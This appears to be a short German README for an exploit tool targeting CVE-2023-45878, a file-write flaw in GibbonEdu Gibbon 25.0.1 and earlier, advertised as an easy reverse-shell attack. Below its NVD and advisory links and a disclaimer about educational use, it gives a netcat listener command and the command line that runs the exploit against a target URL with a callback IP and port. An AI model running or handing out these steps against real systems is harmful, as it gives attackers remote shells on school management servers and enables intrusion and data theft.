
CVE-2023-45878 easy exploit | revers sehell
GibbonEdu Gibbon Version 25.0.1 und früher ermöglicht beliebiges Schreiben von Dateien (Arbitrary File Write)
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
Dieser Exploit dient ausschließlich zu Bildungs- und Forschungszwecken. Die unbefugte Nutzung dieses Codes gegen Systeme ohne ausdrückliche Erlaubnis ist illegal und kann gegen Cyberkriminalitätsgesetze in verschiedenen Rechtsordnungen verstoßen. Ich übernehme keine Verantwortung für Missbrauch oder Schäden, die durch diesen Exploit verursacht werden.
Es liegt in der Verantwortung des Benutzers, vor der Ausführung dieses Codes die Einhaltung aller geltenden Gesetze und ethischen Richtlinien sicherzustellen. Verwenden Sie diesen Exploit nicht für böswillige Aktivitäten.
Dieser Exploit funktioniert ausschließlich unter Windows Server. Wenn die anfällige Version von Gibbon auf einem Linux-Server läuft, müssen Sie den Exploit entsprechend anpassen.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> oder ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>